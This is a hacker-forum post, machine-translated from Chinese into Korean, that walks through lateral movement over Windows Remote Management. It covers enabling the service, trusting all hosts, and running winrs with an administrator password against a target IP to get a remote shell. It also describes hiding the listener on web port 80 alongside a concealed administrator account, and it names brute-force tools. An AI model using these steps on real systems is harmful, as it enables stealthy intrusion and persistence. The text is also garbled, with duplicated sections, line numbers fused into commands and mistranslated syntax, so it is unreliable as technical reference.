KoreanHackerTeam
Moderator
WinRM 기반 수평 이동
DCOM 및 WMI 원격 관리의 대안으로 WINRM은 HTTP/S를 전송 메커니즘으로 사용하여 XML 형식 메시지를 전달하는 WSMA를 통해 원격 컴퓨터와 세션을 설정하는 데 사용됩니다. 최신 Windows 시스템에서 WinRM HTTP는 TCP 포트 5985를 통해 통신하는 반면 HTTP (TLS)는 TCP 포트 5986을 통해 통신합니다.
WinRM은 NTLM 및 Kerberos (도메인) 인증을 기본적으로 지원합니다. 초기 인증 후 WinRM 세션은 AES 암호화 (Microsoft Docs)를 사용하여 보호됩니다.
참고 : 원격 연결을 수락하려면 WinRM 서비스를 구성하고 실행해야합니다. WinRM은 연결에 몇 가지 단계가 더 필요할 수 있습니다. 자세한 내용은이 Pentest Lab 기사를 참조하십시오.
※ winRM横向移动同时适用于工作组和域环境。
Win Server 2012가 시작된 후 WinRM 서비스 버전 만 기본적으로 Port 5985를 들으므로 원격 임의의 호스트를 관리 할 수 있습니다.
WinRM 상태 쿼리
12345678ps C: \ Users \ Administrator get -wmiobject -class win32_service | where -object {$ _. name -like 'winrm'} exitcode : 1077name : winrmprocessid : 0StartMode : ManualState : STOPEDSTATUS : 확인 다음 명령 중 하나를 활성화하려면 OK
12winrm QuickConfig -Q #이 명령이 실행되면 방화벽 예외 규칙이 자동으로 추가되고 포트 5985가 릴리스됩니다. psRemoting -Force 쿼리를 다시 활성화하십시오
12345678ps C: \ Users \ Administrator get -wmiobject -class win32_service | where-object {$ _. name-like 'winrm'} exitcode : 0name : winrmprocessid : 1128StartMode : Autostate : Runningstatus : OK
1WINRM SET WINRM/CONFIG/LEASCENER? address=*+Transport=http @{port='80 '}
1WINRM GET GET GET WANRM/CONFIG2) 모든 클라이언트 IP 연결을 허용합니다
12winrm set winrm/config/client @{trustedHosts='*'} winrm e winrm/config/listener #view 청취 주소 및 포트
123WINRS ERROR:WINRM 클라이언트는 요청을 처리 할 수 없습니다. 기본 인증은 다음 조건에서 IP 주소와 함께 사용할 수 있습니다. HTTPS 또는 대상이 TrustEdHosts 목록에 있고 명시 적 자격 증명이 제공되므로 : 전송합니다. winrm.cmd를 사용하여 신뢰할 수있는 호스트를 구성하십시오. TrustedHosts 목록의 컴퓨터는 인증되지 않을 수 있습니다. TrustedHosts를 설정하는 방법에 대한 자세한 내용은 다음 명령 : WinRM 도움말 구성을 실행하십시오. WinRS Error:Winrm 클라이언트는 요청을 처리 할 수 없습니다. 인증 체계가 Kerberos와 다르거나 클라이언트 컴퓨터가 도메인에 결합되지 않은 경우 HTTPS 전송을 사용해야합니다. 그렇지 않으면 대상 컴퓨터를 TrustedHosts 구성 설정에 추가해야합니다. winrm.cmd를 사용하여 신뢰할 수있는 호스트를 구성하십시오. TrustedHosts 목록의 컴퓨터는 인증되지 않을 수 있습니다. 이 컨텐츠에 대한 자세한 내용은 다음 명령 : WinRM 도움말 구성을 실행하여 제공됩니다. 공격 시스템에서 다음 명령을 실행하고 모든 호스트를 신뢰하도록 설정 한 다음 연결하십시오.
12345678910111213141516C: \ Users \ AdministratorWinrm Set WinRM/config/config/client @{trustedHosts='*'} Client NetworkDelayms=5000 urlpRefix=wman allowunencrypted=false 기본=true kerberos=true convettion=true convetout=true convetments=true convetments=true convetments=true convections=true contrube http=5985 https=5986 TrustedHosts=*
대상 포트
대상 시스템
사용 튜토리얼
Winrm 폭발
포트 5985/5986
창
Winrmexec
5985
창
1) 대상 WinRM 서비스 구성, 청취 포트를 변경하여 재사용을 활성화하십시오.
12WINRM SET WINRM/CONFIG/LEARDER? address=*+전송=http @{port='80 '} winrm set winrm/config/service @{enablecompatibilityhttplistener='true '} 2) 링크 대상
1WINRS -R:192.168.86.114 -U:192.168.86.114 \ 관리자 -p:123456!@#$% Whoami이 방법은 웹 서비스가있는 기계에 적합합니다. 새 포트를 열지 않습니다. 숨겨진 관리자 사용자를 추가하는 것과 협력하는데, 이는 매우 숨겨져 있습니다.
winRM简介
WINRM (Windows Remote Management)은 표준 간단한 객체 액세스 프로토콜 (SOAC)을 기반으로 한 방화벽 친화적 인 프로토콜 인 Microsoft의 구현입니다. Windows는 원격으로 명령을 실행하는 여러 가지 방법 중 하나입니다.DCOM 및 WMI 원격 관리의 대안으로 WINRM은 HTTP/S를 전송 메커니즘으로 사용하여 XML 형식 메시지를 전달하는 WSMA를 통해 원격 컴퓨터와 세션을 설정하는 데 사용됩니다. 최신 Windows 시스템에서 WinRM HTTP는 TCP 포트 5985를 통해 통신하는 반면 HTTP (TLS)는 TCP 포트 5986을 통해 통신합니다.
WinRM은 NTLM 및 Kerberos (도메인) 인증을 기본적으로 지원합니다. 초기 인증 후 WinRM 세션은 AES 암호화 (Microsoft Docs)를 사용하여 보호됩니다.
참고 : 원격 연결을 수락하려면 WinRM 서비스를 구성하고 실행해야합니다. WinRM은 연결에 몇 가지 단계가 더 필요할 수 있습니다. 자세한 내용은이 Pentest Lab 기사를 참조하십시오.
※ winRM横向移动同时适用于工作组和域环境。
利用条件
通信的双方都需要开启WinRM服务
WINRS는 WIN Server 2008/Win7 이상 시스템에 적합하지만 WIN Server 2008/PC 정식 버전 시스템은 기본적으로 꺼집니다.Win Server 2012가 시작된 후 WinRM 서비스 버전 만 기본적으로 Port 5985를 들으므로 원격 임의의 호스트를 관리 할 수 있습니다.
WinRM 상태 쿼리
12345678ps C: \ Users \ Administrator get -wmiobject -class win32_service | where -object {$ _. name -like 'winrm'} exitcode : 1077name : winrmprocessid : 0StartMode : ManualState : STOPEDSTATUS : 확인 다음 명령 중 하나를 활성화하려면 OK
12winrm QuickConfig -Q #이 명령이 실행되면 방화벽 예외 규칙이 자동으로 추가되고 포트 5985가 릴리스됩니다. psRemoting -Force 쿼리를 다시 활성화하십시오
12345678ps C: \ Users \ Administrator get -wmiobject -class win32_service | where-object {$ _. name-like 'winrm'} exitcode : 0name : winrmprocessid : 1128StartMode : Autostate : Runningstatus : OK
服务端防火墙允许WinRM服务端口通信
기본값은 5985, 5986; 5985가 켜져 있지만 5986이 꺼진 경우 WinRM 서비스는 HTTP 연결 만 허용하도록 구성됩니다. 기본 포트를 수정하려면 다음을 사용할 수 있습니다.1WINRM SET WINRM/CONFIG/LEASCENER? address=*+Transport=http @{port='80 '}
WinRM通信两端配置要求
1) WinRM의 특정 구성을 확인하십시오.1WINRM GET GET GET WANRM/CONFIG2) 모든 클라이언트 IP 연결을 허용합니다
12winrm set winrm/config/client @{trustedHosts='*'} winrm e winrm/config/listener #view 청취 주소 및 포트
远程管理
원격으로 연결할 때 다음 오류가 발생할 수 있습니다.123WINRS ERROR:WINRM 클라이언트는 요청을 처리 할 수 없습니다. 기본 인증은 다음 조건에서 IP 주소와 함께 사용할 수 있습니다. HTTPS 또는 대상이 TrustEdHosts 목록에 있고 명시 적 자격 증명이 제공되므로 : 전송합니다. winrm.cmd를 사용하여 신뢰할 수있는 호스트를 구성하십시오. TrustedHosts 목록의 컴퓨터는 인증되지 않을 수 있습니다. TrustedHosts를 설정하는 방법에 대한 자세한 내용은 다음 명령 : WinRM 도움말 구성을 실행하십시오. WinRS Error:Winrm 클라이언트는 요청을 처리 할 수 없습니다. 인증 체계가 Kerberos와 다르거나 클라이언트 컴퓨터가 도메인에 결합되지 않은 경우 HTTPS 전송을 사용해야합니다. 그렇지 않으면 대상 컴퓨터를 TrustedHosts 구성 설정에 추가해야합니다. winrm.cmd를 사용하여 신뢰할 수있는 호스트를 구성하십시오. TrustedHosts 목록의 컴퓨터는 인증되지 않을 수 있습니다. 이 컨텐츠에 대한 자세한 내용은 다음 명령 : WinRM 도움말 구성을 실행하여 제공됩니다. 공격 시스템에서 다음 명령을 실행하고 모든 호스트를 신뢰하도록 설정 한 다음 연결하십시오.
12345678910111213141516C: \ Users \ AdministratorWinrm Set WinRM/config/config/client @{trustedHosts='*'} Client NetworkDelayms=5000 urlpRefix=wman allowunencrypted=false 기본=true kerberos=true convettion=true convetout=true convetments=true convetments=true convetments=true convections=true contrube http=5985 https=5986 TrustedHosts=*
远程命令执行
12C: \ users \ AdministratorWinrs -R:192.168.86.114 -U:192.168.86.114 \ Advination -P:12456! WHOAMIWIN -WIN7 \ 관리자获取交互式的shell
1234567891011121314151617181920c: \ users \ Administrator -Winrs -R:192.168.86.114 -u3333192.168 -P:123456!@#$% CMDMICROSOFT Windows [버전 6.1.7601] 모든 권리 보유 (C) 2009 Microsoft Corporation. 모든 권리 보유. C: \ Users \ AdministoratoripConfigWindows IP 구성 이더넷 어댑터 로컬 연결 : 특정 DNS 접미사에 연결합니다. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .로드 중...
github.com
利用工具
모듈 기능대상 포트
대상 시스템
사용 튜토리얼
Winrm 폭발
포트 5985/5986
창
로드 중...
k8gege.org
5985
창
로드 중...
k8gege.org
WSMan-WinRM
Ladon
대상이 WinRM을 켜면 Peekaboo 도구를 사용하여 대상 3389를 활성화 할 수 있습니다.其他利用
WinRM 청취 포트를 5985에서 80 또는 443으로 변경합니다. 포트가 웹 서비스이더라도 웹 서비스에 영향을 미치지 않습니다. 다음과 같이 사용하십시오1) 대상 WinRM 서비스 구성, 청취 포트를 변경하여 재사용을 활성화하십시오.
12WINRM SET WINRM/CONFIG/LEARDER? address=*+전송=http @{port='80 '} winrm set winrm/config/service @{enablecompatibilityhttplistener='true '} 2) 링크 대상
1WINRS -R:192.168.86.114 -U:192.168.86.114 \ 관리자 -p:123456!@#$% Whoami이 방법은 웹 서비스가있는 기계에 적합합니다. 새 포트를 열지 않습니다. 숨겨진 관리자 사용자를 추가하는 것과 협력하는데, 이는 매우 숨겨져 있습니다.
开启远程主机3389
로드 중...
t3ngyu.leanote.com
로드 중...
bohops.com
로드 중...
xz.aliyun.com
로드 중...
www.cnblogs.com